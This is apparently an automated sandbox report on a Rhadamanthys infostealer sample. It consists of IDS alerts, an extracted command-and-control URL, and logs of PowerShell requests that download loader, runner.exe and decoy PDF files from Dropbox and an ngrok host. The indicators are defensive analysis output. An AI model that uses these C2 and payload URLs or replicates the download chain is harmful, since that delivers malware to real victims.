                      Source: Binary string: wntdll.pdb source: 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000003.2672985656.0000000004EE0000.00000004.00000001.00020000.00000000.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000003.2673228387.0000000005080000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000003.2678687711.0000000005800000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000003.2678434932.0000000005660000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernel32.pdbUGP source: 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000003.2673659739.0000000005000000.00000004.00000001.00020000.00000000.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000003.2673539742.0000000004EE0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000003.2679053609.0000000005660000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000003.2679182345.0000000005780000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdbUGP source: 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000003.2674173791.0000000005100000.00000004.00000001.00020000.00000000.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000003.2673969723.0000000004EE0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000003.2679900766.0000000005880000.00000004.00000001.00020000.00000000.sdmp
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 4x nop then dec esp31_2_00000160FB070511

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 104.161.43.18:2845 -> 192.168.2.5:49901
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: https://104.161.43.18:2845/7e56fc199c7194d0/g5rgxmg9.bkfop
                      Source: global trafficTCP traffic: 192.168.2.5:49901 -> 104.161.43.18:2845
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeHTTP traffic: Redirect from: www.dropbox.com to https://ucface448887177da6d79d4eb2fe.dl.dropboxusercontent.com/cd/0/get/cgidpj0z5-ttxaxwlvgbwlhcilphieacefc0cmgd2qiinnxpiiy5pfy_e4_ipbzpv2q77v5r-4-wutgcf2lhbluwi4rbdqp-uevflnougm8eor3utrthf-rzxl8s-km9k1z3xgoqyyp0wjcqam_l0rfy/file?dl=1#
                      Source: Joe Sandbox ViewIP Address: 162.125.65.15 162.125.65.15
                      Source: Joe Sandbox ViewIP Address: 162.125.69.18 162.125.69.18
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49715 -> 162.125.69.18:443
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49809 -> 162.125.69.18:443
                      Source: global trafficHTTP traffic detected: GET /api/secure/f08a7638d48ba191b651003837c0a34d HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 23glcrtmzxqgwfpq3oujitt.ngrok.pizzaConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /scl/fi/wf5wpi8bl6ww5u4qyuqt2/secure.txt?rlkey=wmur9sahbystk50935h0aqsmc&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /cd/0/get/CgjJ1hn5AQ9QSDUUYQYY62v9V2E1KCzIWtVlBlXzGQOSQhhkJgjnHskltQzGu7DOvXvcGlymKFm1p0-r-Uh5NHAfhfXP1XVTdTkB4S5UPaso_T6uLMIJjNUeZQQjp6FfUTakNkhy8Oe4tqbUL4XV5wA5/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: uc023df04e495715c365ca7fbb53.dl.dropboxusercontent.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /scl/fi/9t9vl9gk9xm4lc1q5j1w2/loader.txt?rlkey=2k6bvt9zpjr10kshfjrooidha&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.com
                      Source: global trafficHTTP traffic detected: GET /scl/fi/zswwoz1nsshfdhbgdi9dy/Documents-about-company-information-and-job-descriptions-4.pdf?rlkey=xb4z4b9qljepnpiu5mkjz888q&dl=1 HTTP/1.1Host: www.dropbox.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /cd/0/get/CghKmixZXXrk_7I-wdqTb6UOa6fFUSV6yfl1fVPALsgIyBLD-Igcn_WbMjaptVHUVi6RfgH6L8mvWvrlXhKTwOpejp4UjibsUygAgl_i1i781Bq-uvOrrU8JEjSqUwroR1hYnopddQqUykH7z0bQcW69/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: uc1b3e73e669a72d85958bcbe13a.dl.dropboxusercontent.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /cd/0/get/CgidpJ0z5-TTxaxwLVGbwLHcILPhiEAceFC0CmgD2QIinNxPiiy5PfY_e4_IpbzPv2Q77V5r-4-wuTgCF2LHBluwi4rBDQP-ueVFLNoUgM8EOR3utRtHf-RZXl8S-km9K1Z3xGOqYyP0WjCqAM_L0Rfy/file?dl=1 HTTP/1.1Host: ucface448887177da6d79d4eb2fe.dl.dropboxusercontent.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /scl/fi/zswwoz1nsshfdhbgdi9dy/Documents-about-company-information-and-job-descriptions-4.pdf?rlkey=xb4z4b9qljepnpiu5mkjz888q&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /cd/0/get/CghMt0qCMFbaG-NuPIK8GzgfQMYcjuyFfJKTiOND84sA8tMUGrkGOZ7fi8XSwE-1bqvHAWSNvtWm1SpXZc9BBK5a9N6-SZDpaLzB_DVGOMpLXj9IZZwa8nHuODpLQG-O2MKwkaVMrbo-C1A-sLTOFtY-/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ucf68a874ab5d88bea64660fe73d.dl.dropboxusercontent.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /scl/fi/uv9rtex94bi18x6hfwnvm/runner.exe?rlkey=ohh5enlv6dylr9jqxqwsffkja&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.com
                      Source: global trafficHTTP traffic detected: GET /cd/0/get/CgjvtlSAZk_sh5IGhdTnIMo7mcgDrrSEyte5G-tVhYFgNTdHl2CFSs9Wh3ng2uo8eQlVPvNYYdJc2HCeE8yuMunb9cYhZzTA-a7IwcEm4yoLOWrZNcdlrkrpNKZmWpGX7Itm3aKjcBJ9qjUwGeoAlcNR/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: uc4dbae793261c4ce4dfc5ef2aef.dl.dropboxusercontent.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /metadata/f08a7638d48ba191b651003837c0a34d HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 23glcrtmzxqgwfpq3oujitt.ngrok.pizzaConnection: Keep-Alive
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                      Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.161.43.18
                      Source: global trafficHTTP traffic detected: GET /api/secure/f08a7638d48ba191b651003837c0a34d HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 23glcrtmzxqgwfpq3oujitt.ngrok.pizzaConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /scl/fi/wf5wpi8bl6ww5u4qyuqt2/secure.txt?rlkey=wmur9sahbystk50935h0aqsmc&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /cd/0/get/CgjJ1hn5AQ9QSDUUYQYY62v9V2E1KCzIWtVlBlXzGQOSQhhkJgjnHskltQzGu7DOvXvcGlymKFm1p0-r-Uh5NHAfhfXP1XVTdTkB4S5UPaso_T6uLMIJjNUeZQQjp6FfUTakNkhy8Oe4tqbUL4XV5wA5/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: uc023df04e495715c365ca7fbb53.dl.dropboxusercontent.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /scl/fi/9t9vl9gk9xm4lc1q5j1w2/loader.txt?rlkey=2k6bvt9zpjr10kshfjrooidha&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.com
                      Source: global trafficHTTP traffic detected: GET /scl/fi/zswwoz1nsshfdhbgdi9dy/Documents-about-company-information-and-job-descriptions-4.pdf?rlkey=xb4z4b9qljepnpiu5mkjz888q&dl=1 HTTP/1.1Host: www.dropbox.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /cd/0/get/CghKmixZXXrk_7I-wdqTb6UOa6fFUSV6yfl1fVPALsgIyBLD-Igcn_WbMjaptVHUVi6RfgH6L8mvWvrlXhKTwOpejp4UjibsUygAgl_i1i781Bq-uvOrrU8JEjSqUwroR1hYnopddQqUykH7z0bQcW69/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: uc1b3e73e669a72d85958bcbe13a.dl.dropboxusercontent.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /cd/0/get/CgidpJ0z5-TTxaxwLVGbwLHcILPhiEAceFC0CmgD2QIinNxPiiy5PfY_e4_IpbzPv2Q77V5r-4-wuTgCF2LHBluwi4rBDQP-ueVFLNoUgM8EOR3utRtHf-RZXl8S-km9K1Z3xGOqYyP0WjCqAM_L0Rfy/file?dl=1 HTTP/1.1Host: ucface448887177da6d79d4eb2fe.dl.dropboxusercontent.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /scl/fi/zswwoz1nsshfdhbgdi9dy/Documents-about-company-information-and-job-descriptions-4.pdf?rlkey=xb4z4b9qljepnpiu5mkjz888q&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /cd/0/get/CghMt0qCMFbaG-NuPIK8GzgfQMYcjuyFfJKTiOND84sA8tMUGrkGOZ7fi8XSwE-1bqvHAWSNvtWm1SpXZc9BBK5a9N6-SZDpaLzB_DVGOMpLXj9IZZwa8nHuODpLQG-O2MKwkaVMrbo-C1A-sLTOFtY-/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: ucf68a874ab5d88bea64660fe73d.dl.dropboxusercontent.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /scl/fi/uv9rtex94bi18x6hfwnvm/runner.exe?rlkey=ohh5enlv6dylr9jqxqwsffkja&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.com
                      Source: global trafficHTTP traffic detected: GET /cd/0/get/CgjvtlSAZk_sh5IGhdTnIMo7mcgDrrSEyte5G-tVhYFgNTdHl2CFSs9Wh3ng2uo8eQlVPvNYYdJc2HCeE8yuMunb9cYhZzTA-a7IwcEm4yoLOWrZNcdlrkrpNKZmWpGX7Itm3aKjcBJ9qjUwGeoAlcNR/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: uc4dbae793261c4ce4dfc5ef2aef.dl.dropboxusercontent.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /metadata/f08a7638d48ba191b651003837c0a34d HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 23glcrtmzxqgwfpq3oujitt.ngrok.pizzaConnection: Keep-Alive
                      Source: powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Policy: base-uri 'self' ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; font-src https://* data: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; frame-ancestors 'self' https://*.dropbox.com ; media-src https://* blob: ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; img-src https://* data: blob: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; child-src https://www.dropbox.com/static/serviceworker/ blob: equals www.yahoo.com (Yahoo)
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: api-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; frame-ancestors 'self' https://*.dropbox.com ; font-src https://* data: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; img-src https://* data: blob: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; base-uri 'self' ; media-src https://* blob: ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker equals www.yahoo.com (Yahoo)
                      Source: powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: base-uri 'self' ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; font-src https://* data: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; frame-ancestors 'self' https://*.dropbox.com ; media-src https://* blob: ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; img-src https://* data: blob: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; child-src https://www.dropbox.com/static/serviceworker/ blob: equals www.yahoo.com (Yahoo)
